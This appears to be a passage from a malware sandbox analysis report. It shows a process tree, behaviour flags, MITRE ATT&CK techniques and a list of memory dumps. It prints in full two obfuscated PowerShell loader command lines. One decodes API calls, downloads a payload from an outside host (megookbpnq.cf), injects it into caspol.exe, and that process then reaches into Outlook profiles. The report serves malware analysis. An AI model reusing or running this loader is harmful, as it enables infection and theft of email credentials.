Mo'TrESt0co8TeFSuARe8GaAPa2knBCh0HaABl1MoBAl6RnELi4baFke9SyEAl4Sa9MoFSp9Ha7waBVaDidBSh7WiBtu0GoAti1DiASu9TjECaAEg9Fi6KnBTe1PaALrABeBUn0BaAWoDKiASt9NiADe1CyEReACo8ScDCaAUnARoBDd0ViAPa1TiBBo6SmAAbBDeBDi4Ve9Af7KaAPi1gaBNu6AlBVe2TuAMiDPhAIo7HaAIn1flBRi7WiEEpATj8Fl9TjASe5PrBMe6PaBSp7JuAEnCFlAfo5DrAPo8Mi9Ce9VeFToEUrFHeELa8Re3moAUd1SiBTr0gi8Re0BaAMe1PoAFa8LiAPr1MoAgr3EaAAk5StBSa0EsADi1Re8No2FlAScBHaBti6Sa8Pr2KiBSt1VeAKrACoADi7InBUg0RaAPrDKuATrBBrADdAAn9Ge4GlASpBTaAKuDtrAHeAskBhi0RiAVa1GuBCo6VaEvaCSdEAtCTuAHo2EuAUnFMaBAg4CaEAm4HeERe0Su8ur8CiBChDSkBAm7StAMa1PiBTi7DaADe8ceBDi1ToANeFMuAFjFCuFPr5muFDk2BeFBo6PaESp4InEBi0gl8ta5EfALi9SiAwy2BrAOv1MeBSt0beAJe5MaFCo0PaEhoDNjESl8ToEUn4HeECaCpo8Ph3Ma8Fo0Un9Of0DrEJu4Un8Te4RoEAnCNo9DrFAl8KvDBoAChAReBTy0Ju9Ga4RiBVa0InBSh6So9Es9ArEKo8MoEUl4di9TiFUl9Vi1Sp8MuDduATaAReBPe0DeFEk7AfFFe6Si9St9BeEAf8DiECh4Hu9MeFDi9la1Fr8BaDPaAPaAbeBSu0HoFse7AbFdy6Ri9Tr9ViESa8AmEAn4Sp9AnFGr9Ve1Ju8SeDreAHuATaBHu0FrFFa7StFNo6De9Pr9ExESkDNoETj4dgECaCSs9ChFSc8udDClAsuARiBPr0Sp9Xy4AsBKo0WeBOt6Co9Re9UlECoDMoESpDGoESeDAa'De;Pi&Fr(Di`$SeABamNifPheShtDiade7Ty)Re Ho`$EfPdoaRutVerreiUdoSatJuiMisDukCl6Va;Do`$HoBPaaHecOpkSosTy Mo=Mo PoftakTapFe Ka`$toACymTofSpeJutUuaDw5Am Dr`$NoAPrmWhfHaeSctAlaMe6Sm;im`$WePamaEktParFoiSuoUntSaiGesEnkSu7sn Mi=Ca PrHDoTbaBSa ag'SoEFe0Ce9Ra1ExAPiADeBre3FlAGuCIdAYo1MaBMi0BjBMa0BiAFa1InAUn0SpBHu3MeFCi5NoFMi6AmFmi2LfFBo7HeETh4SyFun9MeELe4InETj0Gr8KvFGeAEs8GeAEx2RaBIn0VuASi1StBSt6VaEChAQu8GyDrsANoAPaBSt2AnAInBaeANeFSnASp1BeESkCSu9laFFu8GrDBoAheAPoBgy0Ri9St4FjBBe0BeBIn6Se9Fr9ryFTuEcyFGaEPr9AfECaAPr1SyBte6maAFuBCaEUn8HeEAu4KlFDi2RaFFu1DeFDe7SkEBo8FaECo4SeFor4MiBKaCkoFBr7NeFFo4AgFAf4KoFAl4AnERe8ToELa4OrFSh4SuBkaCDeFIs0DiFTa4CeEChDHa'Ut;Ob&De(Sp`$ClASomFofGaeBatOvaBo7sk)Ce In`$WaPAbaFatKorCoiScoSjtThiafsPrkTy7Ki;Hj`$XcPMeaKrtkurPaiEjoCotFiiPrsAfkCa8Ca Me=Be UnHSoTbuBSk Mi'MoEan0Pe9Ur6AfAXe1EaBOv7SkBSt4JaAmuBgoAUrAusABa0AnASc1StAStAanEBy4AnFTe9ReERm4BaENe0Ti8SkFSuANo8haAAl2PeBun0diAAd1SeBKr6ToESkASn8ShDSaAStABaBEx2DeAFyBTiASyFOpAOr1KrERaCFu9EkFRi8InDByAInAAnBSt0Be9He4PaBRo0SoBCa6Ku9pa9puFSkEGuFDiERa9SiEInAAt1FiBGr6LeABvBOrEMu8acESm4NoFFi3inFch7MeFNu0UdFSk2AnFTaDMoFFrDGeFEx1MuFVe6CaEHa8DaEUn4PaFGr4OpBRaCSaFTh7ViFLa4SaFCo4BrFop4FrEPa8AkENo4krFCh4FaBSeCdiFSi0DiEDiDYa'Re;Az&Ba(Ex`$DiAAmmGafVreSutGraSt7At)Sk An`$MaPReachtAsrJoiAdoNetFoiBesBlkFo8Ty;Ov`$UnRReesykTevAliAfsFiiCetHy0Un1Un go=Ze Fe'SkhHatMotsapKe:Va/Hy/FimUneLngFloUnoVakTobUnpBunSkqOu.UncSpfCo/OvSIntHyiStlIslMeeVe.VisFleBaaRa'In;Ab`$EtRRiePikPavMeiLasSuiSitGr0Tr0fl Ti=St PrHAmTPiBGa Fe'MiEMa0Rd8Ur7HoASyBinBSt1FoAClATjBUn0HaEQu4KlFEx9UnETh4TiEAcCCo8ToATrACo1exBNo3SkEHy9Af8RoBkiASe6PiABrEDiAAf1CaARe7BuBHe0FaESe4Be8SeAFoAJi1SuBWi0RaEDeAXa9Un3TuABe1GaANi6st8Hy7urABe8KlAstDDiAfo1TrANoAUnBNa0OpEDiDStEThAPr8Ra0CoASpBPaBLy3HyAHaALsAAn8AaAAfBSsAKe5SiALa0Ke9En7FuBIn0KoBBu6SeABeDEuAAaASpAUn3BuEReCOpELo0Fl9Me6DdACa1StAGuFReBGi2KnATrDArBSn7FlAKoDNeBDo0TrFJa4AsFCh5RaESkDPe'Bu;Be`$LuPUdaBrtHarFoiAgoJotZaiBusKikPy8Hj Ba=Fe PlHSmTLaBRi Bo'MeEOv0Li9Ra1BeABaAOrBSe3SaABaCunAli1NeBBe0ObBBu0HeABa1caAOr0NaBDe3IdFTr5ScFfr6FrFAd2suFEm6BoFBa9PeETh0AmAOp1PrAFoAOvBSt2BaFArETrAej5evBFa4BeBBe4EmAdo0IvAfo5LiBFo0SpAEx5Ge'Pe;Gr&Re(Ta`$TaAHumDrfGoeTatPaaRa7To)No Je`$TaPApaCotScrUdiSfoSktTiiAlsfakTi8An;Rg`$ThURenSawLahIdeRetFetTeeSadSiwUn1Un2Co6Ch2Ma=an`$PoUBenNowbahAfeSktLetSteGrdInwRe1Ou2Ka6Tr2Hi+ep'Mo\LaCCoealyUnlMooSinCeeKlsCa2Sp3No0Dr.andGlauntIn'Ge;Br`$rnCbeoaluGrnEptSo=Po'Pr'Mo;SuiPyfUn Se(Be-DinOpoBatex(skTUneResKotPa-LaPUraXetBahDu Di`$ViUPanCowEkhDieAntTotBreTrdGewpa1Ha2Ki6Re2An)Gu)Sp Mo{ScwAmhPriVilSoeRa Me(Ak`$SnCAloKouOdnSotSy Co-PueKoqUd Aq'Re'To)Ge Fa{De&Ov(Um`$FoALemIlfstePotTaasn7Ku)Ra Vi`$GeRareArkGivSliEtsPuiKatSo0Ta0Qu;UdSMatDaaAurKatHv-InSaklMueVaePhpho tr5Te;Pr}ChSEneButGe-LiCOvoRenKotaleTanTltTe mr`$FrUMinSnwexhCaeEntPotRaeArdSowLa1Un2Kn6Un2Sm St`$FrCfaoYauPrnPotTe;Sa}Ko`$OpCcroInuKenSttUn kv=Im DeGSheGltMa-MoCFeoManSttKieSnnPatRd Su`$BrUVinTywKvhSteRutNstPleHadGrwCe1Mt2Fo6No2la;Ba`$DrPDiaRetLerReiTeoReteliStsVekBe9Pr Ze=Ln BiHUnTBaBRr hu'CoESa0Be9Ge4KuAJg5MoBMa0CrBAb6TaALaDGeAKhBStBDo0vaAmaDinBkn7GuAOrFinEDa4AfFre9TyEha4Li9UnFKa9ph7flBKuDDoBMi7ErBOr0AdAOr1LuAJi9BiERaASv8Re7AcAGeBGiANoAMoBtr2HeAVa1OvBFu6AaBIc0Pa9Ta9SkFUnEVdFLaEOv8Hj2BoBRe6VaAAfBBrASk9No8Lo6ScASa5SpBFr7OpAEq1PaFDi2FeFRe0Ze9de7OpBSt0DaBSk6NoAUnDSnAVmAUdAob3raEEnCTeEBr0Fd8Au7ChAUnBMaBFo1FoAHyATaBPl0AkEMiDKn'As;Ma&So(Re`$jvAUnmCofTeeLetHaaal7No)Ga Sa`$BaPAxanatMirPaiGooErtRiiGrsAnkMo9He;Fn`$GaCAgoSkuMenBotSk0Ru Be=Ac SyHSlTRiBNu Tr'Ep9BoFsp9Si7EnBTeDBrBCu7PoBFa0UnAUl1CrAUn9KoESmAOm9Sk6EdBSk1hyAunADuBPs0fiAVoDSeADi9AlAGr1biEUnABa8MiDBrAStAClBDy0BlAPr1AnBla6LeAAnBBeBCa4Fu9fo7NeAAz1SoBCo6StBFe2RoAOpDSkAAp7SkAAn1OvBUn7SyEKoATe8Fu9EbASp5FoBTv6ReBBa7PrALyCHeAAg5AfAFa8ga9Ph9StFChETiFFaEDr8En7EmAPrBUnBSk4UnBOvDDuEOpCovECo0Ra9Ac4ErAEr5StBBa0CaBJu6MiACrDFiAOvBFoBTr0ReANaDTiBva7ThAChFHyEFl8JoESt4SkFDr4UnEBa8FoEVa4EmENa4PrEFi0Ce9Li1TrAReASlBDe3UnAReCSpASp1YnBGy0noBCh0BoAIn1BeABo0PaBBn3WrFEx5ReFHa6SaFNy2WhFTe7unEHe8KuESh4UsFDi2TjFAt1FuFDy7ReEsmDDa'Ta;Br&Ov(Op`$HaAimmStfJeeBetHaaEg7Tr)li At`$TeCHaoGruJanCatDi0Sp;Pa`$WaAFisDeyCymChtSaowi=En`$SqPSuaCutHerVaichoBltSliSusUtkEj.BrcLroUmuRdnNitSb-An6Un5Bu3ta;St`$GiCBioLouHunEntIn1Na Ry=Kr ShHRkTRaBDa oo'De9ScFMy9Sk7QuBReDAnBRe7ToBSi0WiAHe1BoALo9CeEReABr9Co6LiBSe1SyAKrAUdBDe0OpASoDPhACr9anAMo1TaEnaAsc8TrDViAMaAInBBr0SkAPh1paBRe6CoADoBGeBAf4To9Po7ReAGa1FoBco6BeBEu2CoARyDAfATa7EnASt1ReBEk7DeECoAEx8Ch9ViASv5clBFr6OrBUd7NaAMoCRrAUr5ReAPa8Sk9Ko9StFInEAmFSaEte8De7WhADiBKlBEl4IlBNrDKoEcaCMoEUn0Kv9As4EtAga5AnBTe0FaBAl6PeAadDAfAhoBRiBca0AfAPiDSkBSa7JaANoFJeEPo8RaEFr4TaFOr2skFBe1AfFBr7AcEAf8NoECr4NaECa0Su9pe6HaAan1smBDe7DeBFu4NeAClBNoADoAUdACr0FoAIn1GaAPrAudESt8EkEBl4hoENu0Af8fr5EuBCa7VeBPlDNoAIn9MeBPr0BuAUrBspEStDUd'Ze;Bo&Ha(Mo`$VeAOumPufTresptShaTo7Di)Jo Ph`$InCBioReuNonCotTa1Ve;To`$PiCsloAruprnantPe2Bo Hu=Fr DaHFoTAfBCa Un'PaEAp0SpAUf2DeBTe6UnAMa5TeAaf3OeBSp0IsABe1ReAAbAUdBSu7OrEBr4BeFSe9ToEmi4Di9KvFAs9Mi7MoBSmDSaBFo7AkBPa0ReAAs1FoAVo9VeEplAwh9He6DrBKa1ShABiASaBDa0AmAMeDCiAMi9GrAam1BiEDeAUn8kaDEgARiAMoBAv0tiAJo1ChBBe6MiAStBPoBSt4Sl9Pr7TeAGr1KaBtr6WeBAu2AcASoDTjApi7koADi1trBIn7BeEPrALe8Gl9FoApl5TrBCo6PyBbe7GoALiCAbAFo5LiAPr8Za9St9AnFAsESoFSaECi8Ri3UdABr1MaBRe0pl8Fo0FlASt1AnASp8FaACa1SvASp3FoASt5vaBBl0SlADe1Ta8Yn2DuASuBEfBCr6Br8Ja2SlBPo1jeAIrAUdAsu7BuBSk0LoARaDAnAArBSkAPyAVi9Tr4EfAEnBafAUnDPrAUnAUdBFo0ReAVe1AsBFr6KrENuCBrEinCSaAPr2PrAStFArBNo4SkEBo4SkEvo0Da9Ni7BiBFo0InAAdDAbAun2ChAOu2DeEAl4SuEEk0Ta8Pu3WeBIn6InAGeBudBUn7reBRe7KnBAf1PlAVo8AwERaDLiEal8FeETr4DaEAmCAn8Hy3Sy8Ku0Ci9Gr0PoEWo4Ol8St4DaEWaCPa9ViFUn8EpDkuAdeAApBZe0Re9Fu4HaBma0LeBIn6Hj9Se9DuEMa8ReEUn4Ae9RaFCl8AdDHaAKrAAsBMe0Ba9Sn4liBWe0FoBMa6Ko9Hv9FrEUn8DiEUn4Pi9jaFKo8NuDfrAToAArBOp0St9De4DiBSl0TuBUn6Sh9Li9OpERe8MaEAe4Su9MaFUn8NoDDrANeAFdBPr0Br9Ma4RaBTr0LyBTj6su9At9MaEEf8RuEFr4Ru9AsFud8SnDMiASyAGgBMo0Pe9Ho4KaBTi0drBGe6si9Pr9McEGrDPrEUl4BeEPrCTi9unFCr8ReDPrATyAFuBCa0Uh9Tr4TaBUh0InBOp6Sp9Ho9DaEPaDGeEdeDBeEInDPa'Fr;Bu&Sk(To`$SmAgumScfKieIntCeaPi7ly)Pa ci`$FlCEaoUnuChnOmtpr2Un;su`$DiCReoRiuStnnotSw3Pe Sy=Un OlHudTBeBSm Li'gaESc0ReAhe2stBLi6ReAHe5klAPh3NaBEx0PoASl1PlAShAGoBPu7UpEUrASt8ouDFlADrAFiBHe2UdAAfBStASeFAvAan1OvEReCMaEKo0La9Mi1HuAOvAAnBRi3ReASlCMeAOu1GuBEk0TrBBa0LaALa1ImAKa0InBNi3MiFPi5ArFMe6DaFLe2KnFUd7UnEXy8SbESi0Un9Un6ovATu1BuBCe7KoBls4doASeBHaADuANaASt0DiARa1AlAOrAOxEVa8unECi0Vi8Gi6SyANo5PeAAf7FsAAuFWoBMa7AaEKu8HuFAl4ReEPr8MaFPh4PeEHjDme'Pa;Pr&El(Om`$ErAlnmRafEdeNotAvaOp7Ly)Ab Fr`$DnCfloAfuFonPrtUn3Ou#Et;""";Function Count9 { param([String]$Compu); For($Unprepa=2; $Unprepa -lt $Compu.Length-1; $Unprepa+=(2+1)){$Rekvisit = $Rekvisit + $Compu.Substring($Unprepa, 1)}; $Rekvisit;}$Amanitopsi0 = Count9 'AnIMaEGeXKr ';$Amanitopsi1= Count9 $Spilled;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Amanitopsi1 ;}else{&$Amanitopsi0 $Amanitopsi1;}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:596
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$Compu); $Aarsra = ''; Write-Host $Aarsra; Write-Host $Aarsra; Write-Host $Aarsra; $Embederne = New-Object byte[] ($Compu.Length / 2); For($Unprepa=0; $Unprepa -lt $Compu.Length; $Unprepa+=2){ $Embederne[$Unprepa/2] = [convert]::ToByte($Compu.Substring($Unprepa, 2), 16); $Embederne[$Unprepa/2] = ($Embederne[$Unprepa/2] -bxor 196); } [String][System.Text.Encoding]::ASCII.GetString($Embederne);}$Unphysi0=HTB '97BDB7B0A1A9EAA0A8A8';$Unphysi1=HTB '89ADA7B6ABB7ABA2B0EA93ADAAF7F6EA91AAB7A5A2A18AA5B0ADB2A189A1B0ACABA0B7';$Unphysi2=HTB '83A1B094B6ABA785A0A0B6A1B7B7';$Unphysi3=HTB '97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA8CA5AAA0A8A196A1A2';$Unphysi4=HTB 'B7B0B6ADAAA3';$Unphysi5=HTB '83A1B089ABA0B1A8A18CA5AAA0A8A1';$Unphysi6=HTB '969097B4A1A7ADA5A88AA5A9A1E8E48CADA0A186BD97ADA3E8E494B1A6A8ADA7';$Unphysi7=HTB '96B1AAB0ADA9A1E8E489A5AAA5A3A1A0';$Unphysi8=HTB '96A1A2A8A1A7B0A1A080A1A8A1A3A5B0A1';$Unphysi9=HTB '8DAA89A1A9ABB6BD89ABA0B1A8A1';$Amfeta0=HTB '89BD80A1A8A1A3A5B0A190BDB4A1';$Amfeta1=HTB '87A8A5B7B7E8E494B1A6A8ADA7E8E497A1A5A8A1A0E8E485AAB7AD87A8A5B7B7E8E485B1B0AB87A8A5B7B7';$Amfeta2=HTB '8DAAB2ABAFA1';$Amfeta3=HTB '94B1A6A8ADA7E8E48CADA0A186BD97ADA3E8E48AA1B397A8ABB0E8E492ADB6B0B1A5A8';$Amfeta4=HTB '92ADB6B0B1A5A885A8A8ABA7';$Amfeta5=HTB 'AAB0A0A8A8';$Amfeta6=HTB '8AB094B6ABB0A1A7B092ADB6B0B1A5A889A1A9ABB6BD';$Amfeta7=HTB '8D819C';$Amfeta8=HTB '98';$Stiff=HTB '91978196F7F6';$Grossul=HTB '87A5A8A893ADAAA0ABB394B6ABA785';function fkp {Param ($Subte, $Semipeacef) ;$Patriotisk0 =HTB 'E085A2B7AFB6E4F9E4EC9F85B4B480ABA9A5ADAA99FEFE87B1B6B6A1AAB080ABA9A5ADAAEA83A1B085B7B7A1A9A6A8ADA1B7ECEDE4B8E493ACA1B6A1E98BA6AEA1A7B0E4BFE4E09BEA83A8ABA6A5A885B7B7A1A9A6A8BD87A5A7ACA1E4E985AAA0E4E09BEA88ABA7A5B0ADABAAEA97B4A8ADB0ECE085A9A2A1B0A5FCED9FE9F599EA81B5B1A5A8B7ECE091AAB4ACBDB7ADF4EDE4B9EDEA83A1B090BDB4A1ECE091AAB4ACBDB7ADF5ED';&($Amfeta7) $Patriotisk0;$Patriotisk5 = HTB 'E097ABA8B7ABF6F0F4E4F9E4E085A2B7AFB6EA83A1B089A1B0ACABA0ECE091AAB4ACBDB7ADF6E8E49F90BDB4A19F9999E484ECE091AAB4ACBDB7ADF7E8E4E091AAB4ACBDB7ADF0EDED';&($Amfeta7) $Patriotisk5;$Patriotisk1 = HTB 'B6A1B0B1B6AAE4E097ABA8B7ABF6F0F4EA8DAAB2ABAFA1ECE0AAB1A8A8E8E484EC9F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA8CA5AAA0A8A196A1A299EC8AA1B3E98BA6AEA1A7B0E497BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA8CA5AAA0A8A196A1A2ECEC8AA1B3E98BA6AEA1A7B0E48DAAB094B0B6EDE8E4ECE085A2B7AFB6EA83A1B089A1B0ACABA0ECE091AAB4ACBDB7ADF1EDEDEA8DAAB2ABAFA1ECE0AAB1A8A8E8E484ECE097B1A6B0A1EDEDEDEDE8E4E097A1A9ADB4A1A5A7A1A2EDED';&($Amfeta7) $Patriotisk1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $Proresign228,[Parameter(Position = 1)] [Type] $Inconsecu = [Void]);$Patriotisk2 = HTB 'E094A5B6A5A8ABA3E4F9E49F85B4B480ABA9A5ADAA99FEFE87B1B6B6A1AAB080ABA9A5ADAAEA80A1A2ADAAA180BDAAA5A9ADA785B7B7A1A9A6A8BDECEC8AA1B3E98BA6AEA1A7B0E497BDB7B0A1A9EA96A1A2A8A1A7B0ADABAAEA85B7B7A1A9A6A8BD8AA5A9A1ECE091AAB4ACBDB7ADFCEDEDE8E49F97BDB7B0A1A9EA96A1A2A8A1A7B0ADABAAEA81A9ADB0EA85B7B7A1A9A6A8BD86B1ADA8A0A1B685A7A7A1B7B799FEFE96B1AAEDEA80A1A2ADAAA180BDAAA5A9ADA789ABA0B1A8A1ECE091AAB4ACBDB7ADFDE8E4E0A2A5A8B7A1EDEA80A1A2ADAAA190BDB4A1ECE085A9A2A1B0A5F4E8E4E085A9A2A1B0A5F5E8E49F97BDB7B0A1A9EA89B1A8B0ADA7A5B7B080A1A8A1A3A5B0A199ED';&($Amfeta7) $Patriotisk2;$Patriotisk3 = HTB 'E094A5B6A5A8ABA3EA80A1A2ADAAA187ABAAB7B0B6B1A7B0ABB6ECE091AAB4ACBDB7ADF2E8E49F97BDB7B0A1A9EA96A1A2A8A1A7B0ADABAAEA87A5A8A8ADAAA387ABAAB2A1AAB0ADABAAB799FEFE97B0A5AAA0A5B6A0E8E4E094B6ABB6A1B7ADA3AAF6F6FCEDEA97A1B08DA9B4A8A1A9A1AAB0A5B0ADABAA82A8A5A3B7ECE091AAB4ACBDB7ADF3ED';&($Amfeta7) $Patriotisk3;$Patriotisk4 = HTB 'E094A5B6A5A8ABA3EA80A1A2ADAAA189A1B0ACABA0ECE085A9A2A1B0A5F6E8E4E085A9A2A1B0A5F7E8E4E08DAAA7ABAAB7A1A7B1E8E4E094B6ABB6A1B7ADA3AAF6F6FCEDEA97A1B08DA9B4A8A1A9A1AAB0A5B0ADABAA82A8A5A3B7ECE091AAB4ACBDB7ADF3ED';&($Amfeta7) $Patriotisk4;$Patriotisk5 = HTB 'B6A1B0B1B6AAE4E094A5B6A5A8ABA3EA87B6A1A5B0A190BDB4A1ECED';&($Amfeta7) $Patriotisk5 ;}$Lyseslukk162 = HTB 'AFA1B6AAA1A8F7F6';$Patriotisk6 = HTB 'E08FA8A2B0A1B6E4F9E49F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA89A5B6B7ACA5A899FEFE83A1B080A1A8A1A3A5B0A182ABB682B1AAA7B0ADABAA94ABADAAB0A1B6ECECA2AFB4E4E088BDB7A1B7A8B1AFAFF5F2F6E4E085A9A2A1B0A5F0EDE8E4EC838090E484EC9F8DAAB094B0B699E8E49F918DAAB0F7F699E8E49F918DAAB0F7F699E8E49F918DAAB0F7F699EDE4EC9F8DAAB094B0B699EDEDED';&($Amfeta7) $Patriotisk6;$Backs = fkp $Amfeta5 $Amfeta6;$Patriotisk7 = HTB 'E091AAB3ACA1B0B0A1A0B3F5F6F2F7E4F9E4E08FA8A2B0A1B6EA8DAAB2ABAFA1EC9F8DAAB094B0B699FEFE9EA1B6ABE8E4F2F1F7E8E4F4BCF7F4F4F4E8E4F4BCF0F4ED';&($Amfeta7) $Patriotisk7;$Patriotisk8 = HTB 'E096A1B7B4ABAAA0A1AAE4F9E4E08FA8A2B0A1B6EA8DAAB2ABAFA1EC9F8DAAB094B0B699FEFE9EA1B6ABE8E4F3F7F0F2FDFDF1F6E8E4F4BCF7F4F4F4E8E4F4BCF0ED';&($Amfeta7) $Patriotisk8;$Rekvisit01 = 'http://megookbpnq.cf/Stille.sea';$Rekvisit00 = HTB 'E087ABB1AAB0E4F9E4EC8AA1B3E98BA6AEA1A7B0E48AA1B0EA93A1A687A8ADA1AAB0EDEA80ABB3AAA8ABA5A097B0B6ADAAA3ECE096A1AFB2ADB7ADB0F4F5ED';$Patriotisk8 = HTB 'E091AAB3ACA1B0B0A1A0B3F5F6F2F6F9E0A1AAB2FEA5B4B4A0A5B0A5';&($Amfeta7) $Patriotisk8;$Unwhettedw1262=$Unwhettedw1262+'\Ceylones230.dat';$Count='';if (-not(Test-Path $Unwhettedw1262)) {while ($Count -eq '') {&($Amfeta7) $Rekvisit00;Start-Sleep 5;}Set-Content $Unwhettedw1262 $Count;}$Count = Get-Content $Unwhettedw1262;$Patriotisk9 = HTB 'E094A5B0B6ADABB0ADB7AFE4F9E49F97BDB7B0A1A9EA87ABAAB2A1B6B099FEFE82B6ABA986A5B7A1F2F097B0B6ADAAA3ECE087ABB1AAB0ED';&($Amfeta7) $Patriotisk9;$Count0 = HTB '9F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA89A5B6B7ACA5A899FEFE87ABB4BDECE094A5B0B6ADABB0ADB7AFE8E4F4E8E4E4E091AAB3ACA1B0B0A1A0B3F5F6F2F7E8E4F2F1F7ED';&($Amfeta7) $Count0;$Asymto=$Patriotisk.count-653;$Count1 = HTB '9F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA89A5B6B7ACA5A899FEFE87ABB4BDECE094A5B0B6ADABB0ADB7AFE8E4F2F1F7E8E4E096A1B7B4ABAAA0A1AAE8E4E085B7BDA9B0ABED';&($Amfeta7) $Count1;$Count2 = HTB 'E0A2B6A5A3B0A1AAB7E4F9E49F97BDB7B0A1A9EA96B1AAB0ADA9A1EA8DAAB0A1B6ABB497A1B6B2ADA7A1B7EA89A5B6B7ACA5A899FEFE83A1B080A1A8A1A3A5B0A182ABB682B1AAA7B0ADABAA94ABADAAB0A1B6ECECA2AFB4E4E097B0ADA2A2E4E083B6ABB7B7B1A8EDE8E4EC838090E484EC9F8DAAB094B0B699E8E49F8DAAB094B0B699E8E49F8DAAB094B0B699E8E49F8DAAB094B0B699E8E49F8DAAB094B0B699EDE4EC9F8DAAB094B0B699EDEDED';&($Amfeta7) $Count2;$Count3 = HTB 'E0A2B6A5A3B0A1AAB7EA8DAAB2ABAFA1ECE091AAB3ACA1B0B0A1A0B3F5F6F2F7E8E096A1B7B4ABAAA0A1AAE8E086A5A7AFB7E8F4E8F4ED';&($Amfeta7) $Count3#"
    3⤵
    - Blocklisted process makes network request
    - Checks QEMU agent file
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:768
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe"
      4⤵
      Checks QEMU agent file
      Accesses Microsoft Outlook profiles
      Suspicious use of NtCreateThreadExHideFromDebugger
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:540

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

1

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

3

T1082

Lateral Movement

Collection

Email Collection

1

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/540-87-0x0000000000401000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/540-94-0x0000000077C70000-0x0000000077DF0000-memory.dmp

Filesize
1.5MB

Download
memory/540-93-0x0000000077C70000-0x0000000077DF0000-memory.dmp

Filesize
1.5MB

Download
memory/540-78-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/540-73-0x0000000000CD768E-mapping.dmp

Download
memory/540-82-0x0000000077C70000-0x0000000077DF0000-memory.dmp

Filesize
1.5MB

Download
memory/540-85-0x0000000000CE0000-0x00000000052F1000-memory.dmp

Filesize
70.1MB

Download
memory/540-86-0x0000000000400000-0x0000000000615000-memory.dmp

Filesize
2.1MB

Download
memory/540-76-0x0000000000CE0000-0x00000000052F1000-memory.dmp

Filesize
70.1MB

Download
memory/540-89-0x0000000000400000-0x0000000000430000-memory.dmp

Filesize
192KB

Download
memory/596-92-0x00000000026BB000-0x00000000026DA000-memory.dmp

Filesize
124KB

Download
memory/596-65-0x00000000026BB000-0x00000000026DA000-memory.dmp

Filesize
124KB

Download
memory/596-67-0x00000000026B4000-0x00000000026B7000-memory.dmp

Filesize
12KB

Download
memory/596-62-0x000000001B870000-0x000000001BB6F000-memory.dmp

Filesize
3.0MB

Download
memory/596-60-0x000007FEF3430000-0x000007FEF3F8D000-memory.dmp

Filesize
11.4MB

Download
memory/596-61-0x00000000026B4000-0x00000000026B7000-memory.dmp

Filesize
12KB

Download
memory/596-59-0x000007FEF3F90000-0x000007FEF49B3000-memory.dmp

Filesize
10.1MB

Download
memory/596-57-0x0000000000000000-mapping.dmp

Download
memory/768-63-0x0000000000000000-mapping.dmp

Download
memory/768-69-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/768-77-0x0000000005B10000-0x000000000A121000-memory.dmp

Filesize
70.1MB

Download
memory/768-74-0x0000000077C70000-0x0000000077DF0000-memory.dmp

Filesize
1.5MB

Download
memory/768-70-0x0000000077A90000-0x0000000077C39000-memory.dmp

Filesize
1.7MB

Download
memory/768-83-0x0000000077C70000-0x0000000077DF0000-memory.dmp

Filesize
1.5MB

Download
memory/768-84-0x0000000077C70000-0x0000000077DF0000-memory.dmp

Filesize
1.5MB

Download
memory/768-75-0x0000000077C70000-0x0000000077DF0000-memory.dmp

Filesize
1.5MB

Download
memory/768-68-0x0000000005B10000-0x000000000A121000-memory.dmp

Filesize
70.1MB

Download
memory/768-66-0x0000000073AD0000-0x000000007407B000-memory.dmp

Filesize
5.7MB

Download
memory/768-64-0x0000000075FF1000-0x0000000075FF3000-memory.dmp

Filesize
8KB

Download
memory/768-90-0x0000000077C70000-0x0000000077DF0000-memory.dmp

Filesize
1.5MB

Download
memory/768-91-0x0000000005B10000-0x000000000A121000-memory.dmp

Filesize
70.1MB

Download
memory/852-56-0x000007FEFC4B1000-0x000007FEFC4B3000-memory.dmp

Filesize
8KB

Download
memory/976-54-0x0000000000000000-mapping.dmp

Download
memory/1496-55-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads